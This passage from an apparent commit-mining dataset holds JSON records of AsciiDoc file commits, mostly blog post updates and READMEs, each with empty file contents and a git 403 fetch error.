sticsearch,gingerwizard\/elasticsearch,naveenhooda2000\/elasticsearch,jprante\/elasticsearch,GlenRSmith\/elasticsearch,shreejay\/elasticsearch,uschindler\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,vroyer\/elassandra,LeoYao\/elasticsearch,mjason3\/elasticsearch,fred84\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,JSCooke\/elasticsearch,alexshadow007\/elasticsearch,MisterAndersen\/elasticsearch,Stacey-Gammon\/elasticsearch,strapdata\/elassandra,sneivandt\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,strapdata\/elassandra,MisterAndersen\/elasticsearch,naveenhooda2000\/elasticsearch,MaineC\/elasticsearch,nezirus\/elasticsearch,LewayneNaidoo\/elasticsearch,MaineC\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,JSCooke\/elasticsearch,umeshdangat\/elasticsearch,maddin2016\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,nezirus\/elasticsearch,MisterAndersen\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch","old_file":"docs\/reference\/setup\/sysconfig\/threads.asciidoc","new_file":"docs\/reference\/setup\/sysconfig\/threads.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"606f916b142b1bd70914c5f792db594bf756e35b","subject":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","message":"Update 2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_file":"_posts\/2018-08-09-constructing-enviroment-for-Elasticsearch-and-Kibana.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c587b40089991a89dcbb2d76decf87ac3077b35f","subject":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","message":"Update 2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_file":"_posts\/2017-09-17-CSAW-CTF-2017-Qual-Baby-Crypt-crypto350.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"166d9b7cc590445ef2730ce02d1be6035eda5b97","subject":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","message":"Update 2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_file":"_posts\/2016-01-30-Balisage-pre-conference-symposium-2016-XML-in-Web-Out.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bcc9ae5f230101c2b31319898d4255cbd9f5ce3","subject":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","message":"Update 2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_file":"_posts\/2019-02-17-Factory-Method-Pattern-For-Simple-but-many-I-F-branch.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"932b96f06f31f6f40d842d8c5f227512856025bf","subject":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","message":"Update 2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_file":"_posts\/2018-01-27-react-router-4-hash-History-link-not-rendering-view-rendered-after-refresh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15c154fa95a786de9a376f81bb30e50532f93024","subject":"Update 2015-12-03-Titre.adoc","message":"Update 2015-12-03-Titre.adoc","repos":"sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io,sfoubert\/sfoubert.github.io","old_file":"_posts\/2015-12-03-Titre.adoc","new_file":"_posts\/2015-12-03-Titre.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sfoubert\/sfoubert.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"621239d446e2215229a24419b33e6c7279377dcf","subject":"added FAQ","message":"added FAQ\n","repos":"ivargrimstad\/snoop,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoop,ivargrimstad\/snoopee,ivargrimstad\/snoopee","old_file":"FAQ.adoc","new_file":"FAQ.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivargrimstad\/snoopee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1c5f6ebd14352e62dea5ff21206539b77dc3dbd","subject":"Moved docs comment to own row (#8993)","message":"Moved docs comment to own row (#8993)\n\n* Moved docs comment to own row\n\nAnyone can read the TODO comment on https:\/\/vaadin.com\/docs\/-\/part\/framework\/advanced\/advanced-logging.html. The comment is directly on same row as normal text, which means that it will be printed out when asciidoc is transformed to html. I moved it now to a new row which will make the asciidoc parser treat is as a comment. Please make a proper fix for it.\n","repos":"kironapublic\/vaadin,mstahv\/framework,mstahv\/framework,peterl1084\/framework,asashour\/framework,peterl1084\/framework,Darsstar\/framework,mstahv\/framework,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin,kironapublic\/vaadin,peterl1084\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework,mstahv\/framework,Darsstar\/framework,kironapublic\/vaadin,asashour\/framework,peterl1084\/framework,kironapublic\/vaadin","old_file":"documentation\/advanced\/advanced-logging.asciidoc","new_file":"documentation\/advanced\/advanced-logging.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/peterl1084\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"071e9831e6cd55aba973e1f6dc69b42963a94e25","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"Turbots\/spring-social,molindo\/spring-social,codeconsole\/spring-social,codeconsole\/spring-social,molindo\/spring-social,Turbots\/spring-social,spring-projects\/spring-social,spring-projects\/spring-social","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Turbots\/spring-social.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fa853611f4258b4cd0187587ae5f1ea4b7a7b491","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dba2b5d3337bcb57e6256234594b2794614413af","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b25d6ebd9cb06c4ec9346ae8a2d564beeb36267","subject":"Updated opcodes.asciidoc","message":"Updated opcodes.asciidoc\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"Doc\/opcodes.asciidoc","new_file":"Doc\/opcodes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"52b0550c067224c8a44daafb1ddda775a77d2d6e","subject":"Added stub file explaining the plugin and classloader system.","message":"Added stub file explaining the plugin and classloader system.\n","repos":"SBuild-org\/sbuild,SBuild-org\/sbuild","old_file":"Thoughts-PluginSystem.adoc","new_file":"Thoughts-PluginSystem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SBuild-org\/sbuild.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"44c57087e342d595ccb8ba6ec125ebfa0781b7f9","subject":"Update 2017-04-09-What-is-needed-for-good-engineering.adoc","message":"Update 2017-04-09-What-is-needed-for-good-engineering.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-09-What-is-needed-for-good-engineering.adoc","new_file":"_posts\/2017-04-09-What-is-needed-for-good-engineering.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dfba43e209a4dc0172f82a9192112432bd181fa2","subject":"Problem: installation of emerald-rs is not accurate","message":"Problem: installation of emerald-rs is not accurate\n\nSolution: give correct instructions to install emerald-rs\n","repos":"dulanov\/emerald-rs","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bd0b41f8437e7cd8d1cf865207e6b6526ae576ff","subject":"adds README (#8)","message":"adds README (#8)\n\n","repos":"arquillian\/arquillian-cube-q","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arquillian\/arquillian-cube-q.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac4d5b303001daae1c72ebf710af456193ad409f","subject":"Here is the doc!","message":"Here is the doc!\n","repos":"chevdor\/sql2asciidoc","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chevdor\/sql2asciidoc.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a58da2b80be3e2ca3cad440540a6acb7b65423e4","subject":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","message":"Update 2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_file":"_posts\/2016-03-28-asciidoc-to-gh-pages-with-travis-ci-docker-asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecd0ef792a4e2d922792c1783805139cb471c2a4","subject":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","message":"Update 2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_file":"_posts\/2017-04-29-I-drill-dough-with-cheap-C-N-C-I-bought-at-Ali-Express.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5276c085dcf846fddaf29fc0eaf9ec01f773eb16","subject":"Delete the file at '_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","message":"Delete the file at '_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_file":"_posts\/2017-05-04-Clone-Duplicate-Node-with-Paragraphs-field-in-Drupal-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f4f3b48a5816393ad0537800f5c9a4df84722523","subject":"Update 2015-02-17-Post-1.adoc","message":"Update 2015-02-17-Post-1.adoc","repos":"DimShadoWWW\/blog,DimShadoWWW\/blog,DimShadoWWW\/blog","old_file":"_posts\/2015-02-17-Post-1.adoc","new_file":"_posts\/2015-02-17-Post-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DimShadoWWW\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ce13eaadc08abd0726edfed0969f06ba7310070","subject":"y2b create post DON'T Buy The Google Pixel Buds","message":"y2b create post DON'T Buy The Google Pixel Buds","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-07-DONTBuyTheGooglePixelBuds.adoc","new_file":"_posts\/2018-02-07-DONTBuyTheGooglePixelBuds.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d8c5a028675f965efab2079d2c2f9ac7d56bdc3","subject":"adding instructions","message":"adding instructions\n","repos":"arun-gupta\/serverless","old_file":"lambda-rds\/readme.asciidoc","new_file":"lambda-rds\/readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arun-gupta\/serverless.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ff45d1f2fd95d188ab2ed6acfd45950ab7c1823f","subject":"Update 2015-09-26-Programming-in-Scala.adoc","message":"Update 2015-09-26-Programming-in-Scala.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_file":"_posts\/2015-09-26-Programming-in-Scala.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b1f6bc540d17e6fd9c9711cd14e8364adb8a09c","subject":"Update 2018-04-13-deploy-by-kubernetes.adoc","message":"Update 2018-04-13-deploy-by-kubernetes.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_file":"_posts\/2018-04-13-deploy-by-kubernetes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"601bb3767999a438a7b49f42ddb5b5b0ca55be96","subject":"Update 2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","message":"Update 2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","new_file":"_posts\/2016-03-21-How-to-set-Message-Of-The-Day-M-O-T-D-on-a-Cisco-router.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8699bc6effd3eb62ef9d151cc01e7e8f7bbaf28","subject":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","message":"Update 2015-09-10-Centos-7-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"142421a578bddcf6251a51a1ecbd6a26659f8043","subject":"y2b create post The New YouTube Share Button!","message":"y2b create post The New YouTube Share Button!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-14-The-New-YouTube-Share-Button.adoc","new_file":"_posts\/2016-06-14-The-New-YouTube-Share-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4868c30eaef84739745d85021a9c9215b71cb2e8","subject":"Update 2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","message":"Update 2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","new_file":"_posts\/2017-10-10-Setting-up-a-VM-for-OP-Agent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"70239c1970137cb62bb81b1848273501eae83a6e","subject":"add info about OVA username\/password","message":"add info about OVA username\/password\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"45fa8df314f053f7d2b72438e4a5fa17d2fc0d5b","subject":"Update 2018-07-03-vr-lt.adoc","message":"Update 2018-07-03-vr-lt.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-07-03-vr-lt.adoc","new_file":"_posts\/2018-07-03-vr-lt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05c9dedb875d65081b5ab3e20579782c60266566","subject":"lecture #3: 20170906 notes","message":"lecture #3: 20170906 notes\n","repos":"jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405,jzacsh\/netwtcpip-cmp405","old_file":"lecture02_20170906.adoc","new_file":"lecture02_20170906.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jzacsh\/netwtcpip-cmp405.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"482d04472d86d59fc420efede344bfa2d99ecf03","subject":"Update 2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","message":"Update 2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","repos":"YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io,YannDanthu\/YannDanthu.github.io","old_file":"_posts\/2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","new_file":"_posts\/2015-08-25-Some-Angularjs-resource-for-best-practice.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannDanthu\/YannDanthu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4d314ff939eed9e5a4afc5673de22ab1ae8ec62a","subject":"Update 2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","message":"Update 2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","new_file":"_posts\/2015-04-02-Rebuild-CommonJs-to-RequireJs-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2d5a49d3ac630694d3975692a34f565a50cbc407","subject":"Update 2016-02-02-CONCEPTS.adoc","message":"Update 2016-02-02-CONCEPTS.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_file":"_posts\/2016-02-02-CONCEPTS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b3ab123973d3a33c3c50ec6b7375f1dfc163ad29","subject":"Update 2015-02-24-change-3.adoc","message":"Update 2015-02-24-change-3.adoc","repos":"RaoUmer\/hubpress.io,RaoUmer\/hubpress.io,RaoUmer\/hubpress.io","old_file":"_posts\/2015-02-24-change-3.adoc","new_file":"_posts\/2015-02-24-change-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/RaoUmer\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c3d525ee49049b1927d8df64e75a4326a4c35e","subject":"Update 2016-01-28-PythonIP.adoc","message":"Update 2016-01-28-PythonIP.adoc","repos":"Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io,Cnlouds\/cnlouds.github.io","old_file":"_posts\/2016-01-28-PythonIP.adoc","new_file":"_posts\/2016-01-28-PythonIP.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Cnlouds\/cnlouds.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"087028782f2725d211463e7e96eed6c9833598e8","subject":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","message":"Update 2016-04-08-A-quien-le-interese-Semana-2.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_file":"_posts\/2016-04-08-A-quien-le-interese-Semana-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f288f2985341e9a78e35ff4c5b888dec6a70e6ef","subject":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","message":"Update 2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_file":"_posts\/2016-03-20-Rhume-incessant-toux-et-mal-de-gorge-recurrent-nez-bouche.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"682eeb3bd8dd65b8e7e930565d44c6ce01edbdc8","subject":"add talk from Android meetup Berlin on 29th June 2016 at c-base","message":"add talk from Android meetup Berlin on 29th June 2016 at c-base\n","repos":"devisnik\/mines,devisnik\/mines,devisnik\/mines","old_file":"talk\/src\/docs\/asciidoc\/flag_em.adoc","new_file":"talk\/src\/docs\/asciidoc\/flag_em.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devisnik\/mines.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"752924ddd68f45fa718f56d6f712afebc70b73ae","subject":"Update 2016-7-2-Life.adoc","message":"Update 2016-7-2-Life.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-Life.adoc","new_file":"_posts\/2016-7-2-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ac395879d1fb5b80f6ac38dcdbb6f07d7b6838e","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcdf5f81ba68cb8a79d85acd8cdb3bb91651ce67","subject":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","message":"Update 2016-01-23-Not-your-Fathers-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_file":"_posts\/2016-01-23-Not-your-Fathers-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 